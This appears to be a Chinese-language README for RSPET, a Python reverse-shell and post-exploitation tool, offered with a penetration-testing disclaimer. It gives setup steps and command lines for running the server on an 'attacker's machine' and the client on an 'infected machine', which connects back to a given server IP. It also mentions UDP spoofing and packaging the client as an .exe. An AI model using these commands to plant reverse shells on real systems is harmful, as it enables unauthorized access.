RSPET(反向 Shell 和后渗透工具)是一个基于 Python 的反向 Shell,具备协助后渗透场景的功能。
免责声明:本软件仅供教育和渗透测试目的,作为概念验证提供。开发者不认可、煽动或以任何其他方式支持未经授权的计算机访问和网络破坏。
注意:min 文件夹已移除。维护两个版本带来的额外开销导致 min 未收到错误修复和重要更新。如果有兴趣使用和维护一个更精简的版本,将创建一个新分支来托管它。
当前版本:v0.3.1
关注:@TheRSPET 获取更新。
*[1]XOR 加密的思路以及客户端的框架来自 primalsecurity.net,所以如果你喜欢这套脚本,你可能会喜欢他们的东西
*[2]UDP 欺骗使用 RAW_SOCKETS,因此要利用它,客户端必须在支持 RAW_SOCKETS 的操作系统(大多数基于 Unix 的系统)上以 root 权限运行。最后,大多数 ISP 都有实现方案,会丢弃或重组欺骗数据包
*[3]再次查看 primalsecurity.net 关于生成 .exe 的完美博客文章
*[4]有关创建插件的详细文档,请参阅在线文档!
rspet_server.py 位于攻击者的机器上并运行以接受连接rspet_client.py 位于被感染的机器上,将启动连接并等待输入。在项目根目录下执行 ./setup.py 将生成所需的证书并通过 pip 安装所有需要的组件。
当然,你也可以通过执行 pip2 install Flask flask-cors 手动安装所需的 pip 包。
你也可以生成自己的密钥-证书对(只需将它们分别命名为 server.key 和 server.crt,并放置在 Server 文件夹中)。
python rspet_server.py [-c #clients, --ip ipToBind, -p portToBind]
max_connections 如果留空则默认为 5
RESTful API:
python rspet_server_api.py [-c #clients, --ip ipToBind, -p portToBind]
客户端:
python rspet_client.py <server_ip> [server_port]
可以进行许多更改以满足个性化需求。
一如既往,如果您有任何建议、错误报告或投诉,请随时联系我。
一个包含 RSPET 的发行版列表
List_Hosts 中显示本项目遵循 Google 的 Python 风格指南,在用于对齐 ":" 标记的空格使用上有微小变化。
本项目欢迎贡献者。如果您实现了新功能或对当前代码进行了改进,请随时提交拉取请求。如果您想建议新功能,请提交一个问题。此外,需要测试人员运行一些标准场景(也许还有一些自己的场景),以降低新版本中出现错误的几率。如果有兴趣进行测试,将创建一个 beta 分支(用于上传待测试的代码)以及一个场景列表。关于贡献机会和指南的完整说明,请查看 RSPET 在线文档中的“贡献”章节
dzervas -- 代码(服务器 OO 重新设计、服务器插件系统实现、错误报告、错误修复)
MIT
i.
.7.
.. :v
c: .x
i.::
:
..i..
#MMMMM
QM AM
9M zM
6M AM
2M 2MX#MM@1.
0M tMMMMMMMMMM;
.X#MMMM ;MMMMMMMMMMMMv
cEMMMMMMMMMU7@MMMMMMMMMMMMM@
.n@MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMM@@#$BWWB#@@#$WWWQQQWWWWB#@MM.
MM ;M.
$M EM
WMO$@@@@@@@@@@@@@@@@@@@@@@@@@@@@#OMM
#M cM
QM tM
MM CMO
.MMMM oMMMt
1MO 6MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM iMM
.M1 BM VM ,Mt
1M @M .............................. WM M6
MM .A8OQWWWWWWWWWWWWWWWWWWWWWWWWWWW0Az2 #M
MM MM.
@MMY vMME
UMMMbi i8MMMt
C@MMMMMbt;;i.......i;XQMMMMMMt
;ZMMMMMMMMMMMMMMM@A;.
蛋糕是谎言。但已经一年了 :)